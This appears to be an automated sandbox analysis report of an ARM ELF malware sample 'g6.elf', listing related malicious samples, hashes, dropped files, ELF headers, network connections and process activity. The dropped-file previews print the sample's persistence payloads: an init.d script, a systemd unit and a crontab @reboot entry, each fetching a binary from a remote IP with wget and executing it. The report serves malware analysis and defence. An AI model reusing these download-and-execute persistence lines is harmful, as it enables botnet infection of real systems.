                    https://www.facebook.com/share/1A9gt2P1afGet hashmaliciousUnknownBrowse
                    • 104.17.25.14
                    Setup.msiGet hashmaliciousUnknownBrowse
                    • 172.67.162.17
                    3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                    • 172.64.41.3
                    L7GNkeVm5e.exeGet hashmaliciousLummaCBrowse
                    • 172.67.179.207
                    3bSDIpSIdF.msiGet hashmaliciousUnknownBrowse
                    • 172.64.41.3
                    NDWffRLk7z.exeGet hashmaliciousLummaCBrowse
                    • 172.67.179.207
                    g3toRYa6JE.exeGet hashmaliciousLummaCBrowse
                    • 104.21.56.70
                    lBb4XI4eGD.exeGet hashmaliciousLummaCBrowse
                    • 172.67.179.207
                    tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                    • 172.67.185.28
                    CANONICAL-ASGBg2.elfGet hashmaliciousUnknownBrowse
                    • 91.189.91.42
                    t6.elfGet hashmaliciousUnknownBrowse
                    • 185.125.190.26
                    na.elfGet hashmaliciousPrometeiBrowse
                    • 185.125.190.26
                    la.bot.arm.elfGet hashmaliciousMiraiBrowse
                    • 91.189.91.42
                    g3.elfGet hashmaliciousUnknownBrowse
                    • 91.189.91.42
                    t1.elfGet hashmaliciousUnknownBrowse
                    • 91.189.91.42
                    g1.elfGet hashmaliciousUnknownBrowse
                    • 91.189.91.42
                    la.bot.arc.elfGet hashmaliciousMiraiBrowse
                    • 91.189.91.42
                    camp.x86.elfGet hashmaliciousMiraiBrowse
                    • 91.189.91.42
                    arm5.elfGet hashmaliciousMiraiBrowse
                    • 91.189.91.42
                    INIT7CHg2.elfGet hashmaliciousUnknownBrowse
                    • 109.202.202.202
                    la.bot.arm.elfGet hashmaliciousMiraiBrowse
                    • 109.202.202.202
                    g3.elfGet hashmaliciousUnknownBrowse
                    • 109.202.202.202
                    t1.elfGet hashmaliciousUnknownBrowse
                    • 109.202.202.202
                    g1.elfGet hashmaliciousUnknownBrowse
                    • 109.202.202.202
                    la.bot.arc.elfGet hashmaliciousMiraiBrowse
                    • 109.202.202.202
                    camp.x86.elfGet hashmaliciousMiraiBrowse
                    • 109.202.202.202
                    arm5.elfGet hashmaliciousMiraiBrowse
                    • 109.202.202.202
                    mpsl.elfGet hashmaliciousMiraiBrowse
                    • 109.202.202.202
                    la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                    • 109.202.202.202
                    ASGHOSTNETDEg3.elfGet hashmaliciousUnknownBrowse
                    • 77.90.22.16
                    ppc.elfGet hashmaliciousMiraiBrowse
                    • 5.175.194.122
                    x86.elfGet hashmaliciousMiraiBrowse
                    • 5.175.146.210
                    m1.elfGet hashmaliciousUnknownBrowse
                    • 77.90.22.16
                    m5.elfGet hashmaliciousUnknownBrowse
                    • 77.90.22.16
                    m2.elfGet hashmaliciousUnknownBrowse
                    • 77.90.22.16
                    Vhl3X1aYeU.exeGet hashmaliciousNjratBrowse
                    • 77.90.22.45
                    build.exeGet hashmaliciousRedLineBrowse
                    • 77.90.22.45
                    server.exeGet hashmaliciousNjratBrowse
                    • 77.90.22.45
                    Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                    • 77.90.25.227
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    /etc/init.d/hellog6.elfGet hashmaliciousUnknownBrowse
                      Process:/tmp/g6.elf
                      File Type:Bourne-Again shell script, ASCII text executable
                      Category:dropped
                      Size (bytes):617
                      Entropy (8bit):4.739574079771775
                      Encrypted:false
                      SSDEEP:12:i5BpMp5kTMp5Gu+a6KqCqXSMG259srxylKNVUdURucTyl:ifpMr8MrPd6KqCqiMGAsrxy8bp4
                      MD5:1CC44176B5452CB7A331133672D937FA
                      SHA1:55B61112A4D7E4CBB59603914B585837120B3B26
                      SHA-256:50DBE8F2AECD2F7B7622A029C811AD6EA3509237C61CEF5B8B59D4450D331303
                      SHA-512:5B8892612AAA8B42B64EE8D3E944FD37EE9D161AEDE9B04A56644CFC00ACAC7806F2287913EF4C861C64A969A19DF77C03A04E3A07029199FF2027E502E290A9
                      Malicious:true
                      Joe Sandbox View:
                      • Filename: g6.elf, Detection: malicious, Browse
                      Reputation:low
                      Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 |C 2 R -1157128192..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                      Process:/tmp/g6.elf
                      File Type:troff or preprocessor input, ASCII text
                      Category:dropped
                      Size (bytes):313
                      Entropy (8bit):5.28368958442553
                      Encrypted:false
                      SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOALMFF5CQgcyskXlIEXwsCBLQmWA4Rv:zb9RZADJiIE+mpqCqXSLLHWrv
                      MD5:106272481A79DAFBC9F2CA3EA5A5AF8E
                      SHA1:7F73F67B29266906E6D999BB9D8AF3A7DB94F652
                      SHA-256:F8E89CA6D7E9EB404DACC618D7B2A0F02020E080D3B40B31CFC22A6DF458C98E
                      SHA-512:08DA4C1E04359A4B3BAAFCD425839AF773885F85883914D817728D9DB81B2133CF8E11ECE459C39AEAFB95974D7B7AA6EA2F16C4CB0BF36C10150E8448A118F2
                      Malicious:false
                      Reputation:low
                      Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 |C 2 R -1157128192..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                      Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):76
                      Entropy (8bit):3.7627880354948586
                      Encrypted:false
                      SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                      MD5:D86A1F5765F37989EB0EC3837AD13ECC
                      SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                      SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                      SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                      Process:/tmp/g6.elf
                      File Type:troff or preprocessor input, ASCII text
                      Category:dropped
                      Size (bytes):134
                      Entropy (8bit):4.800827342303799
                      Encrypted:false
                      SSDEEP:3:SH3YFKKLf0FeMPHRCQUIycDSGuVskXQYlIUU0XzT9Fw2sePn:SH3oLMFF5CQgcyskXlIEX9W5Cn
                      MD5:9B9B99343B1C51347C7CD56FD0CBA203
                      SHA1:E7928B952E7663F5DD5B197991FECF0E4FA8D96E
                      SHA-256:1F82514A1A49132BF080A77291456C85AB663AB000CE34F1344C0118F1DD790E
                      SHA-512:D14EDEBFD57F7B3E5B4EA2DDAE5BA77F2D3ED28177E2F5DE923BCF8A1797AD5EF88D6868DF55E8D870380DCD66B16BE1AA1F3BAD94791373F0EEE392F4AF8616
                      Malicious:true
                      Reputation:low
                      Preview:@rebootrm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                      Process:/tmp/g6.elf
                      File Type:zlib compressed data
                      Category:dropped
                      Size (bytes):259
                      Entropy (8bit):3.383607598144853
                      Encrypted:false
                      SSDEEP:6:3DDF4OXM/VUT4DF4W/IQ3j/VjmsVot/VOArB/VF:vvXNc+QS/
                      MD5:B505F08901027BC48BE5464656B3D36B
                      SHA1:E549BCAAE78C54B7E4DE0EF688823C09C1798593
                      SHA-256:150D62C1E051259EB8A0D90643BAED3D8A1511C8D27833F7BCC62E1BC3637594
                      SHA-512:38825AE08F027A6766EF3F69F69E69EF290B11491E80A9C0735B396AC5D9229B2BEA2AA9777EBBADEA33B8375F97D4A33E675A7ECD3C8C23A288D742499CB8DB
                      Malicious:false
                      Preview:8000-1f000 r-xp 00000000 fd:00 531606 /tmp/g6.elf.26000-27000 rw-p 00016000 fd:00 531606 /tmp/g6.elf.27000-2e000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                      Process:/usr/bin/crontab
                      File Type:troff or preprocessor input, ASCII text
                      Category:dropped
                      Size (bytes):324
                      Entropy (8bit):5.264730303739549
                      Encrypted:false
                      SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3pg4iGMQ5UYLtCFt3HYoLMFF5CQgcyskXlIEN:8Qj7QEuLut83pdUeHLUHYRqCqXSK
                      MD5:145926116B0C937A6D68C11D291D31CA
                      SHA1:E5F6E3F3F1A9FC26E7A089E6BD2D843BD0516540
                      SHA-256:A6DECDC12E602DBCB5965FAFD7C1EF7D07E8F38DCAC7FD2BD5403E9FFE272974
                      SHA-512:44D44E807CB9573977B850B76436E023131D286AAD8D4FD409529914394EE0E59035CB023D1532676CF9499F75F09D6622B948AB023C3234504FD45491BA268F
                      Malicious:true
                      Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Sun Jan 12 16:42:59 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 |C 2 R -1157128192..p2 > /dev/null 2>&1;".
                      File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                      Entropy (8bit):6.119008817339163
                      TrID:
                      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                      File name:g6.elf
                      File size:93'372 bytes
                      MD5:8718f3367ac74935cd1fa1f542917234
                      SHA1:8983d66200c8167fc859852226a45356b38d3624
                      SHA256:d80c634884bbde73b5dd48cee37a5e1bc11055bb15e320c2b41b2c2a76d6e34a
                      SHA512:50bdc66c8830df02bba27e889a09fe24fa90d24a3682661e9162f6af9b4c85b9fc6373a64b0a03f72afc9cc644894764b493e63cff7470411d5a2173c4ae1a04
                      SSDEEP:1536:3/2nzPchPepE6kDsDYrqeQ0LQ28c23uc5hRoXalCjimymPd0lWc6n5gIZgTeg3E:sVDurnQvc23uc5U/ymPd4b6+JTzE
                      TLSH:8D93185AF9815B41C5D411BBBE1E529E33076BA8E3EA7203ED201B2537CAA1F0F77506
                      File Content Preview:.ELF..............(.........4...<j......4. ...(........p.c.......... ... ............................d...d...............d...d...d......\9...............d...d...d..................Q.td..................................-...L..................@-.,@...0....S

                      ELF header

                      Class:ELF32
                      Data:2's complement, little endian
                      Version:1 (current)
                      Machine:ARM
                      Version Number:0x1
                      Type:EXEC (Executable file)
                      OS/ABI:UNIX - System V
                      ABI Version:0
                      Entry Point Address:0x8194
                      Flags:0x4000002
                      ELF Header Size:52
                      Program Header Offset:52
                      Program Header Size:32
                      Number of Program Headers:5
                      Section Header Offset:92732
                      Section Header Size:40
                      Number of Section Headers:16
                      Header String Table Index:15
                      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                      NULL0x00x00x00x00x0000
                      .initPROGBITS0x80d40xd40x100x00x6AX004
                      .textPROGBITS0x80f00xf00x149040x00x6AX0016
                      .finiPROGBITS0x1c9f40x149f40x100x00x6AX004
                      .rodataPROGBITS0x1ca040x14a040x19700x00x2A004
                      .ARM.extabPROGBITS0x1e3740x163740x180x00x2A004
                      .ARM.exidxARM_EXIDX0x1e38c0x1638c0x1200x00x82AL204
                      .eh_framePROGBITS0x264ac0x164ac0x40x00x3WA004
                      .tbssNOBITS0x264b00x164b00x80x00x403WAT004
                      .init_arrayINIT_ARRAY0x264b00x164b00x40x00x3WA004
                      .fini_arrayFINI_ARRAY0x264b40x164b40x40x00x3WA004
                      .gotPROGBITS0x264bc0x164bc0xa80x40x3WA004
                      .dataPROGBITS0x265640x165640x43c0x00x3WA004
                      .bssNOBITS0x269a00x169a00x34680x00x3WA004
                      .ARM.attributesARM_ATTRIBUTES0x00x169a00x160x00x0001
                      .shstrtabSTRTAB0x00x169b60x830x00x0001
                      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                      EXIDX0x1638c0x1e38c0x1e38c0x1200x1204.56420x4R 0x4.ARM.exidx
                      LOAD0x00x80000x80000x164ac0x164ac6.11220x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                      LOAD0x164ac0x264ac0x264ac0x4f40x395c6.21590x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                      TLS0x164b00x264b00x264b00x00x80.00000x4R 0x4.tbss
                      GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 12, 2025 23:42:58.103863001 CET42836443192.168.2.2391.189.91.43
                      Jan 12, 2025 23:42:58.871769905 CET4251680192.168.2.23109.202.202.202
                      Jan 12, 2025 23:43:00.576426029 CET4622353192.168.2.231.1.1.1
                      Jan 12, 2025 23:43:00.581537008 CET53462231.1.1.1192.168.2.23
                      Jan 12, 2025 23:43:00.581621885 CET4622353192.168.2.231.1.1.1
                      Jan 12, 2025 23:43:00.581734896 CET4622353192.168.2.231.1.1.1
                      Jan 12, 2025 23:43:00.586723089 CET53462231.1.1.1192.168.2.23
                      Jan 12, 2025 23:43:00.586755037 CET53462231.1.1.1192.168.2.23
                      Jan 12, 2025 23:43:00.586821079 CET4622353192.168.2.231.1.1.1
                      Jan 12, 2025 23:43:01.900650024 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:43:01.905683994 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:43:01.905755997 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:43:02.903203011 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:43:02.908202887 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:43:02.908283949 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:43:02.908677101 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:43:02.913544893 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:43:12.949820042 CET43928443192.168.2.2391.189.91.42
                      Jan 12, 2025 23:43:25.236099958 CET42836443192.168.2.2391.189.91.43
                      Jan 12, 2025 23:43:29.331671953 CET4251680192.168.2.23109.202.202.202
                      Jan 12, 2025 23:43:33.426959991 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:43:33.432003975 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:43:53.904179096 CET43928443192.168.2.2391.189.91.42
                      Jan 12, 2025 23:44:04.142739058 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:44:04.147798061 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:44:12.989635944 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:44:12.995080948 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:44:13.176270008 CET56254882877.90.22.16192.168.2.23
                      Jan 12, 2025 23:44:13.176425934 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:44:45.097093105 CET488285625192.168.2.2377.90.22.16
                      Jan 12, 2025 23:44:45.102281094 CET56254882877.90.22.16192.168.2.23

                      System Behavior

                      Start time (UTC):22:42:54
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:/tmp/g6.elf
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/bin/sh
                      Arguments:/bin/sh -c "systemctl daemon-reload > /dev/null 2>&1"
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/systemctl
                      Arguments:systemctl daemon-reload
                      File size:996584 bytes
                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/bin/sh
                      Arguments:/bin/sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/crontab
                      Arguments:crontab /tmp/crontab.tmp
                      File size:43720 bytes
                      MD5 hash:66e521d421ac9b407699061bf21806f5

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/bin/sh
                      Arguments:/bin/sh -c "/etc/init.d/hello > /dev/null 2>&1"
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/bin/sh
                      Arguments:-
                      File size:129816 bytes
                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:43:00
                      Start date (UTC):12/01/2025
                      Path:/tmp/g6.elf
                      Arguments:-
                      File size:4956856 bytes
                      MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                      Start time (UTC):22:42:55
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/xfce4-panel
                      Arguments:-
                      File size:375768 bytes
                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                      Start time (UTC):22:42:55
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                      Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                      File size:35136 bytes
                      MD5 hash:ac0b8a906f359a8ae102244738682e76

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/xfce4-panel
                      Arguments:-
                      File size:375768 bytes
                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                      Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                      File size:35136 bytes
                      MD5 hash:ac0b8a906f359a8ae102244738682e76

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/xfce4-panel
                      Arguments:-
                      File size:375768 bytes
                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                      Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                      File size:35136 bytes
                      MD5 hash:ac0b8a906f359a8ae102244738682e76

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/xfce4-panel
                      Arguments:-
                      File size:375768 bytes
                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                      Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                      File size:35136 bytes
                      MD5 hash:ac0b8a906f359a8ae102244738682e76

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/xfce4-panel
                      Arguments:-
                      File size:375768 bytes
                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                      Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                      File size:35136 bytes
                      MD5 hash:ac0b8a906f359a8ae102244738682e76

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/bin/xfce4-panel
                      Arguments:-
                      File size:375768 bytes
                      MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                      Start time (UTC):22:42:56
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                      Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                      File size:35136 bytes
                      MD5 hash:ac0b8a906f359a8ae102244738682e76

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/systemd/systemd
                      Arguments:-
                      File size:1620224 bytes
                      MD5 hash:9b2bec7092a40488108543f9334aab75

                      Start time (UTC):22:42:59
                      Start date (UTC):12/01/2025
                      Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                      Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                      File size:22760 bytes
                      MD5 hash:3633b075f40283ec938a2a6a89671b0e